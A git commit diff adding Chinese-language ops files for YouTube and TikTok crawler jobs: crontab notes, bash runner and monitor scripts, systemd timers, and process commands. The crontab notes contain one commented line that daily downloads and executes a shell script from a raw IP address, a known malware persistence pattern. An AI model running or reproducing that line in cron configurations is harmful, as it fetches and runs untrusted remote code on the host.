初始化提交

This commit is contained in:
dxin
2025-10-13 11:05:51 +08:00
commit ab171d45bb
301 changed files with 59788 additions and 0 deletions

View File

@@ -0,0 +1,62 @@
crontab -l
crontab -e
*/1 * * * * bash /data/webapps/prod_yt_search_crawler/cron_run_yt_search_crawler.sh
0 10 * * * /data/webapps/test_yt_data_update/scripts/run_update_yt.sh >> /data/webapps/test_yt_data_update/logs/cron_update_yt.log 2>&1
0 10 * * 1 /data/webapps/test_yt_data_update/scripts/run_update_yt_week.sh >> /data/webapps/test_yt_data_update/logs/cron_update_yt_week.log 2>&1
每10分支执行一次: */10 * * * * bash /data/webapps/yt_data_update/monitor_update_yt_day.sh
晚上8点执行一次: 0 20 * * * bash /data/webapps/prod_nano_crawler/cron_run_nano_crawler.sh
每天的 11:15 AM: 15 11 * * *
7 14 * * * bash /data/webapps/prod_nano_crawler/cron_run_nano_crawler.sh
### @daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
用 tee 重新启动(日志自动写入多个文件):
nohup python async_yt.py | tee -a output.log > output_$(date +%Y%m%d).log 2>&1 &
1、这是我的定时任务
0 10 * * * /data/webapps/test_yt_data_update/scripts/run_update_yt.sh >> /data/webapps/test_yt_data_update/logs/cron_update_yt.log 2>&1*
2、run_update_yt.shw文件
#!/bin/bash
LOCKFILE="/tmp/update_yt.lock"
LOGFILE="/data/webapps/test_yt_data_update/logs/update_yt.log"
cd /data/webapps/test_yt_data_update/
if [ -e "$LOCKFILE" ]; then
echo "$(date): Task is already running, skipping." >> "$LOGFILE"
exit 1
fi
touch "$LOCKFILE"
source ~/.bashrc
conda activate py310
pip install -r requirements.txt
python update_yt.py >> "$LOGFILE" 2>&1
rm -f "$LOCKFILE"
3、经过一天发现有以下问题
3.1、通过日志 update_yt.log 发现定时任务确实10点第一次启动运行脚本成功但是后续没每分钟都执行一次持续了一小时我只需要它每天10点启动一次以下是日志
- Active tasks: 11/12
- Queue sizes: video=0, channel=0
2025-04-11 10:00:06,880 - update_yt.py - INFO - Starting update tasks...
2025-04-11 10:00:09,125 - update_yt.py - INFO - aiohttp session initialized successfully
Fri Apr 11 10:01:01 CST 2025: Task is already running, skipping.
Fri Apr 11 10:02:01 CST 2025: Task is already running, skipping.
Fri Apr 11 10:03:01 CST 2025: Task is already running, skipping.
Fri Apr 11 10:04:01 CST 2025: Task is already running, skipping.
Fri Apr 11 10:05:01 CST 2025: Task is already running, skipping.
3.2、定时任务本身的日志cron_update_yt.log 太冗杂且没有时间戳分不清是什么时间的cron也没有开始结束之类的日志提示以下是日志而且它每分钟执行一次导致它日志又60次相同的
Requirement already satisfied: PyMySQL==1.1.1 in /root/miniconda3/envs/py310/lib/python3.10/site-packages (from -r requirements.txt (line 13)) (1.1.1)
Requirement already satisfied: python-dotenv==1.0.1 in /root/miniconda3/envs/py310/lib/python3.10/site-packages (from -r requirements.txt (line 14)) (1.0.1)
Requirement already satisfied: typing_extensions==4.12.2 in /root/miniconda3/envs/py310/lib/python3.10/site-packages (from -r requirements.txt (line 15)) (4.12.2)
/data/webapps/test_yt_data_update/scripts/run_update_yt.sh: line 15: 30412 Killed python update_yt.py >> "$LOGFILE" 2>&1

View File

@@ -0,0 +1,35 @@
#!/bin/bash
LOCKFILE="/tmp/update_yt_week.lock"
LOGFILE="/data/webapps/yt_data_update/logs/update_yt_week.log"
CRONLOG="/data/webapps/yt_data_update/logs/cron_update_yt_week.log"
{
echo "[$(date '+%F %T')] ==== Cron 任务启动 ===="
cd /data/webapps/yt_data_update/ || {
echo "[$(date '+%F %T')] 未能进入目标目录"
exit 1
}
if [ -e "$LOCKFILE" ]; then
echo "[$(date '+%F %T')] 任务已经在运行, 跳过。"
exit 1
fi
touch "$LOCKFILE"
source ~/.bashrc
conda activate py310
echo "[$(date '+%F %T')] 安装依赖中..."
pip install -r requirements.txt
echo "[$(date '+%F %T')] 运行周更脚本update_yt_week.py..."
python update_yt.py >> "$LOGFILE" 2>&1
echo "[$(date '+%F %T')] 任务完成."
rm -f "$LOCKFILE"
echo "[$(date '+%F %T')] ==== Cron 任务结束 ===="
} >> "$CRONLOG" 2>&1

View File

@@ -0,0 +1,48 @@
#!/bin/bash
LOCKFILE="/tmp/update_yt.lock"
LOGFILE="/data/webapps/test_yt_data_update/logs/update_yt.log"
CRONLOG="/data/webapps/test_yt_data_update/logs/cron_update_yt.log"
{
echo "[$(date '+%F %T')] ==== Cron 任务启动 ===="
cd /data/webapps/test_yt_data_update/ || {
echo "[$(date '+%F %T')] 未能进入目标目录"
exit 1
}
if [ -e "$LOCKFILE" ]; then
echo "[$(date '+%F %T')] 任务已经在运行, 跳过。"
exit 1
fi
touch "$LOCKFILE"
source ~/.bashrc
conda activate py310
echo "[$(date '+%F %T')] 安装依赖中..."
pip install -r requirements.txt
echo "[$(date '+%F %T')] 运行日更脚本update_yt.py..."
python update_yt.py >> "$LOGFILE" 2>&1
echo "[$(date '+%F %T')] 任务完成."
rm -f "$LOCKFILE"
echo "[$(date '+%F %T')] ==== Cron 任务结束 ===="
} >> "$CRONLOG" 2>&1

View File

@@ -0,0 +1,52 @@
#!/bin/bash
# ========== 配置路径 ==========
LOCKFILE="/tmp/main_py.lock"
PROJECT_DIR="/data/webapps/prod_nano_crawler"
LOGFILE="$PROJECT_DIR/logs/nano_crawler.log"
CRONLOG="$PROJECT_DIR/logs/cron_nano_crawler.log"
# ========== 开始记录 cron 执行日志 ==========
{
echo "[$(date '+%F %T')] ==== 定时任务开始 ===="
# ========== 切换目录 ==========
cd "$PROJECT_DIR" || {
echo "[$(date '+%F %T')] ❌ 无法进入项目目录:$PROJECT_DIR"
exit 1
}
# ========== 判断是否已有任务在运行 ==========
if [ -e "$LOCKFILE" ]; then
echo "[$(date '+%F %T')] ⚠️ 检测到已有任务在运行,跳过此次执行"
exit 1
fi
# ========== 创建锁文件 ==========
touch "$LOCKFILE"
# ========== 加载环境变量,激活 conda 环境 ==========
source ~/.bashrc
conda activate py310
# ========== 安装依赖 ==========
echo "[$(date '+%F %T')] 📦 安装依赖中..."
pip install -r requirements.txt
# ========== 执行 Python 脚本 ==========
echo "[$(date '+%F %T')] 🚀 开始执行 main.py ..."
python main.py > "$LOGFILE" 2>&1
status=$?
# ========== 判断执行状态 ==========
if [ $status -ne 0 ]; then
echo "[$(date '+%F %T')] ❗ 脚本执行异常,退出码:$status"
else
echo "[$(date '+%F %T')] ✅ 脚本执行完成"
fi
# ========== 清理锁文件 ==========
rm -f "$LOCKFILE"
echo "[$(date '+%F %T')] ==== 定时任务结束 ===="
} > "$CRONLOG" 2>&1

View File

@@ -0,0 +1,52 @@
#!/bin/bash
========== 配置路径 ==========
LOCKFILE="/tmp/async_yt_py.lock"
PROJECT_DIR="/data/webapps/prod_yt_search_crawler"
LOGFILE="$PROJECT_DIR/output.log"
CRONLOG="$PROJECT_DIR/cron_output.log"
========== 开始记录 cron 执行日志 ==========
{
echo "[$(date '+%F %T')] ==== 定时任务开始 ===="
========== 切换目录 ==========
cd "$PROJECT_DIR" || {
echo "[$(date '+%F %T')] ❌ 无法进入项目目录:$PROJECT_DIR"
exit 1
}
========== 判断是否已有任务在运行 ==========
if [ -e "$LOCKFILE" ]; then
echo "[$(date '+%F %T')] ⚠️ 检测到已有任务在运行,跳过此次执行"
exit 1
fi
========== 创建锁文件 ==========
touch "$LOCKFILE"
========== 加载环境变量,激活 conda 环境 ==========
source ~/.bashrc
conda activate py310
========== 安装依赖 ==========
echo "[$(date '+%F %T')] 📦 安装依赖中..."
pip install -r requirements.txt
========== 执行 Python 脚本 ==========
echo "[$(date '+%F %T')] 🚀 开始执行 async_yt.py ..."
python async_yt.py > "$LOGFILE" 2>&1
status=$?
========== 判断执行状态 ==========
if [ $status -ne 0 ]; then
echo "[$(date '+%F %T')] ❗ 脚本执行异常,退出码:$status"
else
echo "[$(date '+%F %T')] ✅ 脚本执行完成"
fi
========== 清理锁文件 ==========
rm -f "$LOCKFILE"
echo "[$(date '+%F %T')] ==== 定时任务结束 ===="
} >> "$CRONLOG" 2>&1

View File

@@ -0,0 +1,52 @@
#!/bin/bash
# ========== 配置路径 ==========
LOCKFILE="/tmp/update_yt.lock"
PROJECT_DIR="/data/webapps/test_yt_data_update"
LOGFILE="$PROJECT_DIR/logs/update_yt.log"
CRONLOG="$PROJECT_DIR/logs/cron_update_yt.log"
# ========== 开始记录 cron 执行日志 ==========
{
echo "[$(date '+%F %T')] ==== 定时任务开始 ===="
# ========== 切换目录 ==========
cd "$PROJECT_DIR" || {
echo "[$(date '+%F %T')] ❌ 无法进入项目目录:$PROJECT_DIR"
exit 1
}
# ========== 判断是否已有任务在运行 ==========
if [ -e "$LOCKFILE" ]; then
echo "[$(date '+%F %T')] ⚠️ 检测到已有任务在运行,跳过此次执行"
exit 1
fi
# ========== 创建锁文件 ==========
touch "$LOCKFILE"
# ========== 加载环境变量,激活 conda 环境 ==========
source ~/.bashrc
conda activate py310
# ========== 安装依赖 ==========
echo "[$(date '+%F %T')] 📦 安装依赖中..."
pip install -r requirements.txt
# ========== 执行 Python 脚本 ==========
echo "[$(date '+%F %T')] 🚀 开始执行 update_yt.py ..."
python update_yt.py >> "$LOGFILE" 2>&1
status=$?
# ========== 判断执行状态 ==========
if [ $status -ne 0 ]; then
echo "[$(date '+%F %T')] ❗ 脚本执行异常,退出码:$status"
else
echo "[$(date '+%F %T')] ✅ 脚本执行完成"
fi
# ========== 清理锁文件 ==========
rm -f "$LOCKFILE"
echo "[$(date '+%F %T')] ==== 定时任务结束 ===="
} >> "$CRONLOG" 2>&1

View File

@@ -0,0 +1,19 @@
[Unit]
Description=Daily update_yt.py script
After=network.target
[Service]
Type=oneshot
WorkingDirectory=/data/webapps/test_yt_data_update
ExecStart=/bin/bash -c '
. ~/.bashrc &&
conda activate py310 &&
/usr/bin/flock -n /tmp/update_yt.lock \
python update_yt.py >> logs/update_yt.log 2>&1
'
StandardOutput=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt.log
StandardError=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt.log
[Install]
WantedBy=multi-user.target

View File

@@ -0,0 +1,11 @@
[Unit]
Description=Run update_yt.py daily script at 10:00
[Timer]
OnCalendar=*-*-* 10:00:00
OnUnitInactiveSec=2h
Persistent=true
Unit=yt_update.service
[Install]
WantedBy=timers.target

View File

@@ -0,0 +1,15 @@
[Unit]
Description=Weekly update_yt_week.py script
After=network.target
[Service]
Type=oneshot
WorkingDirectory=/data/webapps/test_yt_data_update
ExecStart=/bin/bash -c '
. ~/.bashrc &&
conda activate py310 &&
/usr/bin/flock -n /tmp/update_yt_week.lock \
python update_yt_week.py >> logs/update_yt_week.log 2>&1
'
StandardOutput=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt_week.log
StandardError=append:/data/webapps/test_yt_data_update/logs/systemd_update_yt_week.log

View File

@@ -0,0 +1,11 @@
[Unit]
Description=Run update_yt_week.py weekly script at 10:00 every Monday
[Timer]
OnCalendar=Mon *-*-* 10:00:00
OnUnitInactiveSec=2h
Persistent=true
Unit=yt_update_week.service
[Install]
WantedBy=timers.target

View File

@@ -0,0 +1,70 @@
# 查看 timer 状态
systemctl list-timers | grep yt_update
# 查看 timer 的详细计划
systemctl status yt_update.timer
# 查看是否成功调用了对应的 service
journalctl -u yt_update.service
# 查看所有激活的定时器
systemctl list-timers
# 查看特定 timer 状态
systemctl status yt_update.timer
# 手动触发任务
systemctl start yt_update.service
# 查看任务日志systemd 层)
tail -f logs/systemd_update_yt.log
# 查看脚本输出日志
tail -f logs/update_yt.log
# 禁用任务
systemctl disable --now yt_update.timer
#--------------------------------------------------------------------------
# 文件部署 & 启动命令
# 将 4 个文件放到 /etc/systemd/system/
sudo cp yt_update* /etc/systemd/system/
sudo cp yt_update_week* /etc/systemd/system/
# 刷新 systemd 配置
sudo systemctl daemon-reload
# 启动并开机自启 timer
sudo systemctl enable --now yt_update.timer
sudo systemctl enable --now yt_update_week.timer
#--------------------------------------------------------------------------
#使 systemd 服务和定时器生效
#重新加载 systemd 配置,以使新的服务和定时器生效:
sudo systemctl daemon-reload
#启动并启用定时器:
sudo systemctl enable yt_update.timer
sudo systemctl start yt_update.timer
sudo systemctl enable yt_update_week.timer
sudo systemctl start yt_update_week.timer
# 检查定时任务状态
#查看 yt_update.timer 和 yt_update_week.timer 的状态,确保它们正常运行:
sudo systemctl status yt_update.timer
sudo systemctl status yt_update_week.timer
# 查看日志
update_yt.py 脚本的日志会保存在 /data/webapps/test_yt_data_update/logs/update_yt.log。
update_yt_week.py 脚本的日志会保存在
/data/webapps/test_yt_data_update/logs/update_yt_week.log
定时任务本身的日志(包括 yt_update.service 和 yt_update_week.service 启动信息)会记录在
/data/webapps/test_yt_data_update/logs/service_log.txt 中。
#你可以通过 journalctl 查看 systemd 服务的日志,也可以使用 cat 或其他命令来查看具体的脚本日志。
journalctl -u yt_update.service
journalctl -u yt_update_week.service

View File

@@ -0,0 +1,83 @@
# /data/sh/start_tk_regio.sh
# crontab -e
# 0 9 * * * /data/sh/start_tk_regio.sh
#!/bin/bash
# 定义变量
APP_DIR="/data/webapps/test_tk_region"
LOG_FILE="$APP_DIR/sh.log"
PYTHON_SCRIPT="tk_region.py"
MAX_ATTEMPTS=10
WAIT_TIME=600 # 10分钟单位为秒
# 记录日志函数
log() {
echo "[$(date +'%Y-%m-%d %H:%M:%S')] $1" >> "$LOG_FILE"
}
# 切换到应用目录
log "==========="
log "切换到应用目录: $APP_DIR"
cd "$APP_DIR" || {
log "无法切换到应用目录 $APP_DIR脚本退出"
exit 1
}
# 检查是否有旧进程在运行
attempt=1
while [ $attempt -le $MAX_ATTEMPTS ]; do
# 查找正在运行的Python脚本进程
log "第 $attempt 次检查是否有旧进程在运行..."
pid=$(ps aux | grep "$PYTHON_SCRIPT" | grep -v grep | awk '{print $2}')
if [ -z "$pid" ]; then
log "未发现运行中的 $PYTHON_SCRIPT 进程,准备启动新进程"
break
else
log "发现运行中的进程PID: $pid"
if [ $attempt -eq $MAX_ATTEMPTS ]; then
log "已达到最大等待次数 ($MAX_ATTEMPTS),仍有进程在运行,放弃启动"
exit 1
fi
log "等待 $((WAIT_TIME/60)) 分钟后再次检查..."
sleep $WAIT_TIME
attempt=$((attempt + 1))
fi
done
# 激活路径
log "激活conda路径"
source ~/.bashrc || {
log "激活conda激活路径失败"
exit 1
}
# 激活环境
log "激活conda环境 py310"
conda activate py310 || {
log "激活conda环境失败"
exit 1
}
log "激活虚拟环境"
source venv/bin/activate || {
log "激活虚拟环境失败"
exit 1
}
# 安装依赖
log "安装依赖包"
pip install -r requirements.txt || {
log "安装依赖包失败"
exit 1
}
# 启动Python脚本
log "启动 $PYTHON_SCRIPT 脚本"
nohup python "$PYTHON_SCRIPT" > output.log 2>&1 &
pid=$!
log "$PYTHON_SCRIPT 已启动PID: $pid"
log "脚本执行完成"

View File

@@ -0,0 +1,73 @@
#!/bin/bash
# 配置区域
PROJECT_DIR="/data/webapps/yt_data_update"
SCRIPT_NAME="update_yt.py"
START_SCRIPT="$PROJECT_DIR/run_update_yt_day.sh"
LOG_DIR="$PROJECT_DIR/logs"
TODAY=$(date +%F)
LOG_FILE="$LOG_DIR/monitor/monitor_day_$TODAY.log"
MAX_RETRY=3
SLEEP_BETWEEN_CHECK=10
# 保证日志目录存在
mkdir -p "$LOG_DIR"
# 计数器文件
COUNT_FILE="$LOG_DIR/monitor/monitor_day_count_$TODAY.txt"
[ ! -f "$COUNT_FILE" ] && echo 0 > "$COUNT_FILE"
COUNT=$(cat "$COUNT_FILE")
COUNT=$((COUNT + 1))
echo $COUNT > "$COUNT_FILE"
log() {
echo "$(date '+%F %T') [第 $COUNT 次执行检查] $1" >> "$LOG_FILE"
}
# 检查是否运行: 匹配到进程:返回状态码 0匹配不到进程:返回退出状态码1
is_running() {
pgrep -f "python $SCRIPT_NAME" > /dev/null 2>&1
return $?
}
# 尝试启动
start_script() {
log "尝试启动脚本..."
bash "$START_SCRIPT"
sleep 1
# 再次检测
if is_running; then
PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
echo "$PID" > "$PROJECT_DIR/update_yt_day.pid"
log "启动成功PID=$PID"
return 0
else
log "启动失败"
return 1
fi
}
# 主流程
if is_running; then
PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
log "脚本已在运行中PID=$PID"
exit 0
fi
log "检测到脚本未运行,开始重启流程..."
RETRY=0
while [ $RETRY -lt $MAX_RETRY ]; do
start_script
sleep $SLEEP_BETWEEN_CHECK
if is_running; then
log "$((RETRY+1)) 次尝试启动成功。"
exit 0
else
log "$((RETRY+1)) 次尝试启动失败。"
fi
RETRY=$((RETRY + 1))
done
log "连续 $MAX_RETRY 次重启失败,放弃本轮重试。"
exit 1

View File

@@ -0,0 +1,73 @@
#!/bin/bash
# 配置区域
PROJECT_DIR="/data/webapps/yt_data_update"
SCRIPT_NAME="update_yt_week.py"
START_SCRIPT="$PROJECT_DIR/run_update_yt_week.sh"
LOG_DIR="$PROJECT_DIR/logs"
TODAY=$(date +%F)
LOG_FILE="$LOG_DIR/monitor/monitor_$TODAY.log"
MAX_RETRY=3
SLEEP_BETWEEN_CHECK=10
# 保证日志目录存在
mkdir -p "$LOG_DIR"
# 计数器文件
COUNT_FILE="$LOG_DIR/monitor/monitor_count_$TODAY.txt"
[ ! -f "$COUNT_FILE" ] && echo 0 > "$COUNT_FILE"
COUNT=$(cat "$COUNT_FILE")
COUNT=$((COUNT + 1))
echo $COUNT > "$COUNT_FILE"
log() {
echo "$(date '+%F %T') [第 $COUNT 次执行检查] $1" >> "$LOG_FILE"
}
# 检查是否运行: 匹配到进程:返回状态码 0匹配不到进程:返回退出状态码1
is_running() {
pgrep -f "python $SCRIPT_NAME" > /dev/null 2>&1
return $?
}
# 尝试启动
start_script() {
log "尝试启动脚本..."
bash "$START_SCRIPT"
sleep 1
# 再次检测
if is_running; then
PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
echo "$PID" > "$PROJECT_DIR/update_yt_week.pid"
log "启动成功PID=$PID"
return 0
else
log "启动失败"
return 1
fi
}
# 主流程
if is_running; then
PID=$(pgrep -f "python $SCRIPT_NAME" | head -n 1)
log "脚本已在运行中PID=$PID"
exit 0
fi
log "检测到脚本未运行,开始重启流程..."
RETRY=0
while [ $RETRY -lt $MAX_RETRY ]; do
start_script
sleep $SLEEP_BETWEEN_CHECK
if is_running; then
log "$((RETRY+1)) 次尝试启动成功。"
exit 0
else
log "$((RETRY+1)) 次尝试启动失败。"
fi
RETRY=$((RETRY + 1))
done
log "连续 $MAX_RETRY 次重启失败,放弃本轮重试。"
exit 1

View File

@@ -0,0 +1,8 @@
#!/bin/bash
source ~/.bashrc
conda activate py310
cd /data/webapps/yt_data_update/
pip install -r requirements.txt
python update_yt.py >> logs/yt_up_date_day_outup/output_day_$(date +%F).log 2>&1 &

View File

@@ -0,0 +1,8 @@
#!/bin/bash
source ~/.bashrc
conda activate py310
cd /data/webapps/yt_data_update/
pip install -r requirements.txt
python update_yt_week.py >> logs/yt_up_date_week_outup/output_week_$(date +%F).log 2>&1 &

View File

@@ -0,0 +1,43 @@
nohup /data/webapps/test_check_tiktok_account/venv/bin/python check_account.py > output.log 2>&1
nohup /data/webapps/test_yt_search_crawler/venv/bin/python async_yt.py > output.log 2>&1
nohup python async_yt.py > output.log 2>&1 &
nohup env PYTHONPATH=/data/webapps/test_influencer_search_agent python -m dialogue.influencer_search > /data/webapps/test_influencer_search_agent/log/test_influencer_search_20250324.log 2>&1 &
ps axjf | grep dialogue.influencer_search
ps axjf | grep async_yt.py
ps aux | grep async_yt.py
ps axjf|grep check_account.py
ps axjf | grep async_tk_crawler.py
ps axjf|grep async_yt.py|grep -v grep |awk '{print "kill -9 ",$2}'|sh -
启动脚本
cd /data/webapps/yt_search_crawler
source venv/bin/activate
nohup python async_yt.py > output.log 2>&1 &
通过 exec -a 给进程“改名”
nohup bash -c "exec -a yt01 python async_yt.py" > output_01.log 2>&1 &
nohup bash -c "exec -a yt02 python async_yt.py" > output_02.log 2>&1 &